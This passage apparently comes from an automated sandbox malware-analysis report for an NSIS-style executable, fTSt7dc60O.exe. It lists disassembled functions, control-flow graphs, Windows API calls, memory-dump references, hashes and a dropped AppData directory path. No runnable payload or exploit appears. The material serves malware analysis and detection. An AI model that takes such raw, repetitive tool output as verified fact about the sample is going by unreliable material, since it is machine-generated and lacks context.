                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll
                                                      • API String ID: 2531174081-1111276337
                                                      • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                      • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                      Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 657 40262e-402653 SetFilePointer MultiByteToWideChar 653->657 655 4026b3-4026b7 654->655 656 402678-40267d 654->656 659 4026d4-4026e0 SetFilePointer 655->659 660 4026b9-4026bd 655->660 656->655 658 40267f-402692 656->658 657->653 661 402655 657->661 658->635 662 402694-40269a 658->662 659->635 663 4026c5-4026d2 660->663 664 4026bf-4026c3 660->664 661->648 662->639 665 4026a0 662->665 663->635 664->659 664->663 665->635
                                                      APIs
                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                        • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709
                                                      • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                      • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                      Function 0040317D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 666 40317d-4031a6 GetTickCount 667 4032e7-4032ef call 402d1a 666->667 668 4031ac-4031d7 call 40330f SetFilePointer 666->668 673 4032f1-4032f6 667->673 674 4031dc-4031ee 668->674 675 4031f0 674->675 676 4031f2-403200 call 4032f9 674->676 675->676 679 403206-403212 676->679 680 4032d9-4032dc 676->680 681 403218-40321e 679->681 680->673 682 403220-403226 681->682 683 403249-403265 call 4063ee 681->683 682->683 684 403228-403248 call 402d1a 682->684 689 4032e2 683->689 690 403267-40326f 683->690 684->683 691 4032e4-4032e5 689->691 692 403271-403287 WriteFile 690->692 693 4032a3-4032a9 690->693 691->673 694 403289-40328d 692->694 695 4032de-4032e0 692->695 693->689 696 4032ab-4032ad 693->696 694->695 697 40328f-40329b 694->697 695->691 696->689 698 4032af-4032c2 696->698 697->681 699 4032a1 697->699 698->674 700 4032c8-4032d7 SetFilePointer 698->700 699->698 700->667
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                        • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                      • WriteFile.KERNELBASE(0040BE90,00410DE9,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                      • SetFilePointer.KERNELBASE(00004D7A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID: A
                                                      • API String ID: 2146148272-1346673623
                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                      Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 701 4015b9-4015cd call 402b3a call 405a3e 706 401614-401617 701->706 707 4015cf-4015eb call 4059c0 CreateDirectoryW 701->707 709 401646-402197 call 401423 706->709 710 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 706->710 715 40160a-401612 707->715 716 4015ed-4015f8 GetLastError 707->716 723 402793-40279a 709->723 724 4029c7-4029d6 709->724 710->724 725 40163e-401641 710->725 715->706 715->707 719 401607 716->719 720 4015fa-401605 GetFileAttributesW 716->720 719->715 720->715 720->719 723->724 725->724
                                                      APIs
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405A4C
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,00000000,000000F0), ref: 00401630
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00401623
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                      • API String ID: 3751793516-3275360645
                                                      • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                      • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                      Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 728 402b7a-402ba3 RegOpenKeyExW 729 402ba5-402bb0 728->729 730 402c0e-402c12 728->730 731 402bcb-402bdb RegEnumKeyW 729->731 732 402bb2-402bb5 731->732 733 402bdd-402bef RegCloseKey call 4062b2 731->733 734 402c02-402c05 RegCloseKey 732->734 735 402bb7-402bc9 call 402b7a 732->735 741 402bf1-402c00 733->741 742 402c15-402c1b 733->742 739 402c0b-402c0d 734->739 735->731 735->733 739->730 741->730 742->739 743 402c1d-402c2b RegDeleteKeyW 742->743 743->739 744 402c2d 743->744 744->730
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                      • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                      Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 746 10001759-10001795 call 10001b18 750 100018a6-100018a8 746->750 751 1000179b-1000179f 746->751 752 100017a1-100017a7 call 10002286 751->752 753 100017a8-100017b5 call 100022d0 751->753 752->753 758 100017e5-100017ec 753->758 759 100017b7-100017bc 753->759 760 1000180c-10001810 758->760 761 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 758->761 762 100017d7-100017da 759->762 763 100017be-100017bf 759->763 767 10001812-1000184c call 100015b4 call 100024a9 760->767 768 1000184e-10001854 call 100024a9 760->768 784 10001855-10001859 761->784 762->758 769 100017dc-100017dd call 10002b5f 762->769 765 100017c1-100017c2 763->765 766 100017c7-100017c8 call 100028a4 763->766 772 100017c4-100017c5 765->772 773 100017cf-100017d5 call 10002645 765->773 779 100017cd 766->779 767->784 768->784 782 100017e2 769->782 772->758 772->766 783 100017e4 773->783 779->782 782->783 783->758 788 10001896-1000189d 784->788 789 1000185b-10001869 call 1000246c 784->789 788->750 794 1000189f-100018a0 GlobalFree 788->794 796 10001881-10001888 789->796 797 1000186b-1000186e 789->797 794->750 796->788 799 1000188a-10001895 call 1000153d 796->799 797->796 798 10001870-10001878 797->798 798->796 800 1000187a-1000187b FreeLibrary 798->800 799->788 800->796
                                                      APIs
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                      • String ID:
                                                      • API String ID: 1791698881-3916222277
                                                      • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                      • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                      Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 803 405e15-405e47 RegOpenKeyExW 804 405e89-405e8c 803->804 805 405e49-405e68 RegQueryValueExW 803->805 806 405e76 805->806 807 405e6a-405e6e 805->807 809 405e79-405e83 RegCloseKey 806->809 808 405e70-405e74 807->808 807->809 808->806 808->809 809->804
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                      • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3677997916-1824292864
                                                      • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                      • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                      • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                      • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                      Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-3083371207
                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                      Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00403347
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 4115351271-3049706366
                                                      • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                      • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                      • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                      • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                      Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
